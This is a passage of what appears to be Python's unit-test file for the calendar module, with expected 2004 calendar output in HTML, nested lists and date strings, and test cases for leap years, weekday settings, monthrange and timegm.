<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="wed">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">April</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">May</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sat">1</td><td class="sun">2</td></tr>
<tr><td class="mon">3</td><td class="tue">4</td><td class="wed">5</td><td class="thu">6</td><td class="fri">7</td><td class="sat">8</td><td class="sun">9</td></tr>
<tr><td class="mon">10</td><td class="tue">11</td><td class="wed">12</td><td class="thu">13</td><td class="fri">14</td><td class="sat">15</td><td class="sun">16</td></tr>
<tr><td class="mon">17</td><td class="tue">18</td><td class="wed">19</td><td class="thu">20</td><td class="fri">21</td><td class="sat">22</td><td class="sun">23</td></tr>
<tr><td class="mon">24</td><td class="tue">25</td><td class="wed">26</td><td class="thu">27</td><td class="fri">28</td><td class="sat">29</td><td class="sun">30</td></tr>
<tr><td class="mon">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">June</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="tue">1</td><td class="wed">2</td><td class="thu">3</td><td class="fri">4</td><td class="sat">5</td><td class="sun">6</td></tr>
<tr><td class="mon">7</td><td class="tue">8</td><td class="wed">9</td><td class="thu">10</td><td class="fri">11</td><td class="sat">12</td><td class="sun">13</td></tr>
<tr><td class="mon">14</td><td class="tue">15</td><td class="wed">16</td><td class="thu">17</td><td class="fri">18</td><td class="sat">19</td><td class="sun">20</td></tr>
<tr><td class="mon">21</td><td class="tue">22</td><td class="wed">23</td><td class="thu">24</td><td class="fri">25</td><td class="sat">26</td><td class="sun">27</td></tr>
<tr><td class="mon">28</td><td class="tue">29</td><td class="wed">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">July</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">August</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
<tr><td class="mon">30</td><td class="tue">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">September</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">October</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="fri">1</td><td class="sat">2</td><td class="sun">3</td></tr>
<tr><td class="mon">4</td><td class="tue">5</td><td class="wed">6</td><td class="thu">7</td><td class="fri">8</td><td class="sat">9</td><td class="sun">10</td></tr>
<tr><td class="mon">11</td><td class="tue">12</td><td class="wed">13</td><td class="thu">14</td><td class="fri">15</td><td class="sat">16</td><td class="sun">17</td></tr>
<tr><td class="mon">18</td><td class="tue">19</td><td class="wed">20</td><td class="thu">21</td><td class="fri">22</td><td class="sat">23</td><td class="sun">24</td></tr>
<tr><td class="mon">25</td><td class="tue">26</td><td class="wed">27</td><td class="thu">28</td><td class="fri">29</td><td class="sat">30</td><td class="sun">31</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">November</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">December</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="fri">31</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr></table></body>
</html>
"""
result_2004_days = [
[[[0, 0, 0, 1, 2, 3, 4],
[5, 6, 7, 8, 9, 10, 11],
[12, 13, 14, 15, 16, 17, 18],
[19, 20, 21, 22, 23, 24, 25],
[26, 27, 28, 29, 30, 31, 0]],
[[0, 0, 0, 0, 0, 0, 1],
[2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15],
[16, 17, 18, 19, 20, 21, 22],
[23, 24, 25, 26, 27, 28, 29]],
[[1, 2, 3, 4, 5, 6, 7],
[8, 9, 10, 11, 12, 13, 14],
[15, 16, 17, 18, 19, 20, 21],
[22, 23, 24, 25, 26, 27, 28],
[29, 30, 31, 0, 0, 0, 0]]],
[[[0, 0, 0, 1, 2, 3, 4],
[5, 6, 7, 8, 9, 10, 11],
[12, 13, 14, 15, 16, 17, 18],
[19, 20, 21, 22, 23, 24, 25],
[26, 27, 28, 29, 30, 0, 0]],
[[0, 0, 0, 0, 0, 1, 2],
[3, 4, 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14, 15, 16],
[17, 18, 19, 20, 21, 22, 23],
[24, 25, 26, 27, 28, 29, 30],
[31, 0, 0, 0, 0, 0, 0]],
[[0, 1, 2, 3, 4, 5, 6],
[7, 8, 9, 10, 11, 12, 13],
[14, 15, 16, 17, 18, 19, 20],
[21, 22, 23, 24, 25, 26, 27],
[28, 29, 30, 0, 0, 0, 0]]],
[[[0, 0, 0, 1, 2, 3, 4],
[5, 6, 7, 8, 9, 10, 11],
[12, 13, 14, 15, 16, 17, 18],
[19, 20, 21, 22, 23, 24, 25],
[26, 27, 28, 29, 30, 31, 0]],
[[0, 0, 0, 0, 0, 0, 1],
[2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15],
[16, 17, 18, 19, 20, 21, 22],
[23, 24, 25, 26, 27, 28, 29],
[30, 31, 0, 0, 0, 0, 0]],
[[0, 0, 1, 2, 3, 4, 5],
[6, 7, 8, 9, 10, 11, 12],
[13, 14, 15, 16, 17, 18, 19],
[20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 0, 0, 0]]],
[[[0, 0, 0, 0, 1, 2, 3],
[4, 5, 6, 7, 8, 9, 10],
[11, 12, 13, 14, 15, 16, 17],
[18, 19, 20, 21, 22, 23, 24],
[25, 26, 27, 28, 29, 30, 31]],
[[1, 2, 3, 4, 5, 6, 7],
[8, 9, 10, 11, 12, 13, 14],
[15, 16, 17, 18, 19, 20, 21],
[22, 23, 24, 25, 26, 27, 28],
[29, 30, 0, 0, 0, 0, 0]],
[[0, 0, 1, 2, 3, 4, 5],
[6, 7, 8, 9, 10, 11, 12],
[13, 14, 15, 16, 17, 18, 19],
[20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 31, 0, 0]]]
]
result_2004_dates = \
[[['12/29/03 12/30/03 12/31/03 01/01/04 01/02/04 01/03/04 01/04/04',
'01/05/04 01/06/04 01/07/04 01/08/04 01/09/04 01/10/04 01/11/04',
'01/12/04 01/13/04 01/14/04 01/15/04 01/16/04 01/17/04 01/18/04',
'01/19/04 01/20/04 01/21/04 01/22/04 01/23/04 01/24/04 01/25/04',
'01/26/04 01/27/04 01/28/04 01/29/04 01/30/04 01/31/04 02/01/04'],
['01/26/04 01/27/04 01/28/04 01/29/04 01/30/04 01/31/04 02/01/04',
'02/02/04 02/03/04 02/04/04 02/05/04 02/06/04 02/07/04 02/08/04',
'02/09/04 02/10/04 02/11/04 02/12/04 02/13/04 02/14/04 02/15/04',
'02/16/04 02/17/04 02/18/04 02/19/04 02/20/04 02/21/04 02/22/04',
'02/23/04 02/24/04 02/25/04 02/26/04 02/27/04 02/28/04 02/29/04'],
['03/01/04 03/02/04 03/03/04 03/04/04 03/05/04 03/06/04 03/07/04',
'03/08/04 03/09/04 03/10/04 03/11/04 03/12/04 03/13/04 03/14/04',
'03/15/04 03/16/04 03/17/04 03/18/04 03/19/04 03/20/04 03/21/04',
'03/22/04 03/23/04 03/24/04 03/25/04 03/26/04 03/27/04 03/28/04',
'03/29/04 03/30/04 03/31/04 04/01/04 04/02/04 04/03/04 04/04/04']],
[['03/29/04 03/30/04 03/31/04 04/01/04 04/02/04 04/03/04 04/04/04',
'04/05/04 04/06/04 04/07/04 04/08/04 04/09/04 04/10/04 04/11/04',
'04/12/04 04/13/04 04/14/04 04/15/04 04/16/04 04/17/04 04/18/04',
'04/19/04 04/20/04 04/21/04 04/22/04 04/23/04 04/24/04 04/25/04',
'04/26/04 04/27/04 04/28/04 04/29/04 04/30/04 05/01/04 05/02/04'],
['04/26/04 04/27/04 04/28/04 04/29/04 04/30/04 05/01/04 05/02/04',
'05/03/04 05/04/04 05/05/04 05/06/04 05/07/04 05/08/04 05/09/04',
'05/10/04 05/11/04 05/12/04 05/13/04 05/14/04 05/15/04 05/16/04',
'05/17/04 05/18/04 05/19/04 05/20/04 05/21/04 05/22/04 05/23/04',
'05/24/04 05/25/04 05/26/04 05/27/04 05/28/04 05/29/04 05/30/04',
'05/31/04 06/01/04 06/02/04 06/03/04 06/04/04 06/05/04 06/06/04'],
['05/31/04 06/01/04 06/02/04 06/03/04 06/04/04 06/05/04 06/06/04',
'06/07/04 06/08/04 06/09/04 06/10/04 06/11/04 06/12/04 06/13/04',
'06/14/04 06/15/04 06/16/04 06/17/04 06/18/04 06/19/04 06/20/04',
'06/21/04 06/22/04 06/23/04 06/24/04 06/25/04 06/26/04 06/27/04',
'06/28/04 06/29/04 06/30/04 07/01/04 07/02/04 07/03/04 07/04/04']],
[['06/28/04 06/29/04 06/30/04 07/01/04 07/02/04 07/03/04 07/04/04',
'07/05/04 07/06/04 07/07/04 07/08/04 07/09/04 07/10/04 07/11/04',
'07/12/04 07/13/04 07/14/04 07/15/04 07/16/04 07/17/04 07/18/04',
'07/19/04 07/20/04 07/21/04 07/22/04 07/23/04 07/24/04 07/25/04',
'07/26/04 07/27/04 07/28/04 07/29/04 07/30/04 07/31/04 08/01/04'],
['07/26/04 07/27/04 07/28/04 07/29/04 07/30/04 07/31/04 08/01/04',
'08/02/04 08/03/04 08/04/04 08/05/04 08/06/04 08/07/04 08/08/04',
'08/09/04 08/10/04 08/11/04 08/12/04 08/13/04 08/14/04 08/15/04',
'08/16/04 08/17/04 08/18/04 08/19/04 08/20/04 08/21/04 08/22/04',
'08/23/04 08/24/04 08/25/04 08/26/04 08/27/04 08/28/04 08/29/04',
'08/30/04 08/31/04 09/01/04 09/02/04 09/03/04 09/04/04 09/05/04'],
['08/30/04 08/31/04 09/01/04 09/02/04 09/03/04 09/04/04 09/05/04',
'09/06/04 09/07/04 09/08/04 09/09/04 09/10/04 09/11/04 09/12/04',
'09/13/04 09/14/04 09/15/04 09/16/04 09/17/04 09/18/04 09/19/04',
'09/20/04 09/21/04 09/22/04 09/23/04 09/24/04 09/25/04 09/26/04',
'09/27/04 09/28/04 09/29/04 09/30/04 10/01/04 10/02/04 10/03/04']],
[['09/27/04 09/28/04 09/29/04 09/30/04 10/01/04 10/02/04 10/03/04',
'10/04/04 10/05/04 10/06/04 10/07/04 10/08/04 10/09/04 10/10/04',
'10/11/04 10/12/04 10/13/04 10/14/04 10/15/04 10/16/04 10/17/04',
'10/18/04 10/19/04 10/20/04 10/21/04 10/22/04 10/23/04 10/24/04',
'10/25/04 10/26/04 10/27/04 10/28/04 10/29/04 10/30/04 10/31/04'],
['11/01/04 11/02/04 11/03/04 11/04/04 11/05/04 11/06/04 11/07/04',
'11/08/04 11/09/04 11/10/04 11/11/04 11/12/04 11/13/04 11/14/04',
'11/15/04 11/16/04 11/17/04 11/18/04 11/19/04 11/20/04 11/21/04',
'11/22/04 11/23/04 11/24/04 11/25/04 11/26/04 11/27/04 11/28/04',
'11/29/04 11/30/04 12/01/04 12/02/04 12/03/04 12/04/04 12/05/04'],
['11/29/04 11/30/04 12/01/04 12/02/04 12/03/04 12/04/04 12/05/04',
'12/06/04 12/07/04 12/08/04 12/09/04 12/10/04 12/11/04 12/12/04',
'12/13/04 12/14/04 12/15/04 12/16/04 12/17/04 12/18/04 12/19/04',
'12/20/04 12/21/04 12/22/04 12/23/04 12/24/04 12/25/04 12/26/04',
'12/27/04 12/28/04 12/29/04 12/30/04 12/31/04 01/01/05 01/02/05']]]
class OutputTestCase(unittest.TestCase):
def normalize_calendar(self, s):
# Filters out locale dependent strings
def neitherspacenordigit(c):
return not c.isspace() and not c.isdigit()
lines = []
for line in s.splitlines(keepends=False):
# Drop texts, as they are locale dependent
            if line and not any(neitherspacenordigit(c) for c in line):
lines.append(line)
return lines
def check_htmlcalendar_encoding(self, req, res):
cal = calendar.HTMLCalendar()
self.assertEqual(
cal.formatyearpage(2004, encoding=req).strip(b' \t\n'),
(result_2004_html % {'e': res}).strip(' \t\n').encode(res)
)
def test_output(self):
self.assertEqual(
self.normalize_calendar(calendar.calendar(2004)),
self.normalize_calendar(result_2004_text)
)
def test_output_textcalendar(self):
self.assertEqual(
calendar.TextCalendar().formatyear(2004).strip(),
result_2004_text.strip()
)
def test_output_htmlcalendar_encoding_ascii(self):
self.check_htmlcalendar_encoding('ascii', 'ascii')
def test_output_htmlcalendar_encoding_utf8(self):
self.check_htmlcalendar_encoding('utf-8', 'utf-8')
def test_output_htmlcalendar_encoding_default(self):
self.check_htmlcalendar_encoding(None, sys.getdefaultencoding())
def test_yeardatescalendar(self):
def shrink(cal):
return [[[' '.join('{:02d}/{:02d}/{}'.format(
d.month, d.day, str(d.year)[-2:]) for d in z)
for z in y] for y in x] for x in cal]
self.assertEqual(
shrink(calendar.Calendar().yeardatescalendar(2004)),
result_2004_dates
)
def test_yeardayscalendar(self):
self.assertEqual(
calendar.Calendar().yeardayscalendar(2004),
result_2004_days
)
def test_formatweekheader_short(self):
self.assertEqual(
calendar.TextCalendar().formatweekheader(2),
'Mo Tu We Th Fr Sa Su'
)
def test_formatweekheader_long(self):
self.assertEqual(
calendar.TextCalendar().formatweekheader(9),
' Monday Tuesday Wednesday Thursday '
' Friday Saturday Sunday '
)
def test_formatmonth(self):
self.assertEqual(
calendar.TextCalendar().formatmonth(2004, 1).strip(),
result_2004_01_text.strip()
)
def test_formatmonthname_with_year(self):
self.assertEqual(
calendar.HTMLCalendar().formatmonthname(2004, 1, withyear=True),
'<tr><th colspan="7" class="month">January 2004</th></tr>'
)
def test_formatmonthname_without_year(self):
self.assertEqual(
calendar.HTMLCalendar().formatmonthname(2004, 1, withyear=False),
'<tr><th colspan="7" class="month">January</th></tr>'
)
class CalendarTestCase(unittest.TestCase):
def test_isleap(self):
# Make sure that the return is right for a few years, and
# ensure that the return values are 1 or 0, not just true or
# false (see SF bug #485794). Specific additional tests may
# be appropriate; this tests a single "cycle".
self.assertEqual(calendar.isleap(2000), 1)
self.assertEqual(calendar.isleap(2001), 0)
self.assertEqual(calendar.isleap(2002), 0)
self.assertEqual(calendar.isleap(2003), 0)
def test_setfirstweekday(self):
self.assertRaises(TypeError, calendar.setfirstweekday, 'flabber')
self.assertRaises(ValueError, calendar.setfirstweekday, -1)
self.assertRaises(ValueError, calendar.setfirstweekday, 200)
orig = calendar.firstweekday()
calendar.setfirstweekday(calendar.SUNDAY)
self.assertEqual(calendar.firstweekday(), calendar.SUNDAY)
calendar.setfirstweekday(calendar.MONDAY)
self.assertEqual(calendar.firstweekday(), calendar.MONDAY)
calendar.setfirstweekday(orig)
def test_illegal_weekday_reported(self):
with self.assertRaisesRegex(calendar.IllegalWeekdayError, '123'):
calendar.setfirstweekday(123)
def test_enumerate_weekdays(self):
self.assertRaises(IndexError, calendar.day_abbr.__getitem__, -10)
self.assertRaises(IndexError, calendar.day_name.__getitem__, 10)
self.assertEqual(len([d for d in calendar.day_abbr]), 7)
def test_days(self):
for attr in "day_name", "day_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 7)
self.assertEqual(len(value[:]), 7)
# ensure they're all unique
self.assertEqual(len(set(value)), 7)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
def test_months(self):
for attr in "month_name", "month_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 13)
self.assertEqual(len(value[:]), 13)
self.assertEqual(value[0], "")
# ensure they're all unique
self.assertEqual(len(set(value)), 13)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
def test_locale_calendars(self):
# ensure that Locale{Text,HTML}Calendar resets the locale properly
# (it is still not thread-safe though)
old_october = calendar.TextCalendar().formatmonthname(2010, 10, 10)
try:
calendar.LocaleTextCalendar(locale='').formatmonthname(2010, 10, 10)
except locale.Error:
# cannot set the system default locale -- skip rest of test
return
calendar.LocaleHTMLCalendar(locale='').formatmonthname(2010, 10)
new_october = calendar.TextCalendar().formatmonthname(2010, 10, 10)
self.assertEqual(old_october, new_october)
class MonthCalendarTestCase(unittest.TestCase):
def setUp(self):
self.oldfirstweekday = calendar.firstweekday()
calendar.setfirstweekday(self.firstweekday)
def tearDown(self):
calendar.setfirstweekday(self.oldfirstweekday)
def check_weeks(self, year, month, weeks):
cal = calendar.monthcalendar(year, month)
self.assertEqual(len(cal), len(weeks))
for i in range(len(weeks)):
self.assertEqual(weeks[i], sum(day != 0 for day in cal[i]))
class MondayTestCase(MonthCalendarTestCase):
firstweekday = calendar.MONDAY
def test_february(self):
# A 28-day february starting on monday (7+7+7+7 days)
self.check_weeks(1999, 2, (7, 7, 7, 7))
# A 28-day february starting on tuesday (6+7+7+7+1 days)
self.check_weeks(2005, 2, (6, 7, 7, 7, 1))
# A 28-day february starting on sunday (1+7+7+7+6 days)
self.check_weeks(1987, 2, (1, 7, 7, 7, 6))
# A 29-day february starting on monday (7+7+7+7+1 days)
self.check_weeks(1988, 2, (7, 7, 7, 7, 1))
# A 29-day february starting on tuesday (6+7+7+7+2 days)
self.check_weeks(1972, 2, (6, 7, 7, 7, 2))
# A 29-day february starting on sunday (1+7+7+7+7 days)
self.check_weeks(2004, 2, (1, 7, 7, 7, 7))
def test_april(self):
# A 30-day april starting on monday (7+7+7+7+2 days)
self.check_weeks(1935, 4, (7, 7, 7, 7, 2))
# A 30-day april starting on tuesday (6+7+7+7+3 days)
self.check_weeks(1975, 4, (6, 7, 7, 7, 3))
# A 30-day april starting on sunday (1+7+7+7+7+1 days)
self.check_weeks(1945, 4, (1, 7, 7, 7, 7, 1))
# A 30-day april starting on saturday (2+7+7+7+7 days)
self.check_weeks(1995, 4, (2, 7, 7, 7, 7))
# A 30-day april starting on friday (3+7+7+7+6 days)
self.check_weeks(1994, 4, (3, 7, 7, 7, 6))
def test_december(self):
# A 31-day december starting on monday (7+7+7+7+3 days)
self.check_weeks(1980, 12, (7, 7, 7, 7, 3))
# A 31-day december starting on tuesday (6+7+7+7+4 days)
self.check_weeks(1987, 12, (6, 7, 7, 7, 4))
# A 31-day december starting on sunday (1+7+7+7+7+2 days)
self.check_weeks(1968, 12, (1, 7, 7, 7, 7, 2))
# A 31-day december starting on thursday (4+7+7+7+6 days)
self.check_weeks(1988, 12, (4, 7, 7, 7, 6))
# A 31-day december starting on friday (3+7+7+7+7 days)
self.check_weeks(2017, 12, (3, 7, 7, 7, 7))
# A 31-day december starting on saturday (2+7+7+7+7+1 days)
self.check_weeks(2068, 12, (2, 7, 7, 7, 7, 1))
class SundayTestCase(MonthCalendarTestCase):
firstweekday = calendar.SUNDAY
def test_february(self):
# A 28-day february starting on sunday (7+7+7+7 days)
self.check_weeks(2009, 2, (7, 7, 7, 7))
# A 28-day february starting on monday (6+7+7+7+1 days)
self.check_weeks(1999, 2, (6, 7, 7, 7, 1))
# A 28-day february starting on saturday (1+7+7+7+6 days)
self.check_weeks(1997, 2, (1, 7, 7, 7, 6))
# A 29-day february starting on sunday (7+7+7+7+1 days)
self.check_weeks(2004, 2, (7, 7, 7, 7, 1))
# A 29-day february starting on monday (6+7+7+7+2 days)
self.check_weeks(1960, 2, (6, 7, 7, 7, 2))
# A 29-day february starting on saturday (1+7+7+7+7 days)
self.check_weeks(1964, 2, (1, 7, 7, 7, 7))
def test_april(self):
# A 30-day april starting on sunday (7+7+7+7+2 days)
self.check_weeks(1923, 4, (7, 7, 7, 7, 2))
# A 30-day april starting on monday (6+7+7+7+3 days)
self.check_weeks(1918, 4, (6, 7, 7, 7, 3))
# A 30-day april starting on saturday (1+7+7+7+7+1 days)
self.check_weeks(1950, 4, (1, 7, 7, 7, 7, 1))
# A 30-day april starting on friday (2+7+7+7+7 days)
self.check_weeks(1960, 4, (2, 7, 7, 7, 7))
# A 30-day april starting on thursday (3+7+7+7+6 days)
self.check_weeks(1909, 4, (3, 7, 7, 7, 6))
def test_december(self):
# A 31-day december starting on sunday (7+7+7+7+3 days)
self.check_weeks(2080, 12, (7, 7, 7, 7, 3))
# A 31-day december starting on monday (6+7+7+7+4 days)
self.check_weeks(1941, 12, (6, 7, 7, 7, 4))
# A 31-day december starting on saturday (1+7+7+7+7+2 days)
self.check_weeks(1923, 12, (1, 7, 7, 7, 7, 2))
# A 31-day december starting on wednesday (4+7+7+7+6 days)
self.check_weeks(1948, 12, (4, 7, 7, 7, 6))
# A 31-day december starting on thursday (3+7+7+7+7 days)
self.check_weeks(1927, 12, (3, 7, 7, 7, 7))
# A 31-day december starting on friday (2+7+7+7+7+1 days)
self.check_weeks(1995, 12, (2, 7, 7, 7, 7, 1))
class TimegmTestCase(unittest.TestCase):
TIMESTAMPS = [0, 10, 100, 1000, 10000, 100000, 1000000,
1234567890, 1262304000, 1275785153,]
def test_timegm(self):
for secs in self.TIMESTAMPS:
tuple = time.gmtime(secs)
self.assertEqual(secs, calendar.timegm(tuple))
class MonthRangeTestCase(unittest.TestCase):
def test_january(self):
# Tests valid lower boundary case.
self.assertEqual(calendar.monthrange(2004,1), (3,31))
def test_february_leap(self):
# Tests February during leap year.
self.assertEqual(calendar.monthrange(2004,2), (6,29))
def test_february_nonleap(self):
# Tests February in non-leap year.
self.assertEqual(calendar.monthrange(2010,2), (0,28))
def test_december(self):
# Tests valid upper boundary case.
self.assertEqual(calendar.monthrange(2004,12), (2,31))
def test_zeroth_month(self):
# Tests low invalid boundary case.
with self.assertRaises(calendar.IllegalMonthError):
calendar.monthrange(2004, 0)
def test_thirteenth_month(self):
# Tests high invalid boundary case.
with self.assertRaises(calendar.IllegalMonthError):
calendar.monthrange(2004, 13)
def test_illegal_month_reported(self):
with self.assertRaisesRegex(calendar.IllegalMonthError, '65'):
calendar.monthrange(2004, 65)
class LeapdaysTestCase(unittest.TestCase):
def test_no_range(self):
# test when no range i.e. two identical years as args
self.assertEqual(calendar.leapdays(2010,2010), 0)
def test_no_leapdays(self):
# test when no leap years in range
self.assertEqual(calendar.leapdays(2010,2011), 0)
def test_no_leapdays_upper_boundary(self):
# test no leap years in range, when upper boundary is a leap year
self.assertEqual(calendar.leapdays(2010,2012), 0)
def test_one_leapday_lower_boundary(self):
# test when one leap year in range, lower boundary is leap year
self.assertEqual(calendar.leapdays(2012,2013), 1)
def test_several_leapyears_in_range(self):
self.assertEqual(calendar.leapdays(1997,2020), 5)
class ConsoleOutputTestCase(unittest.TestCase):
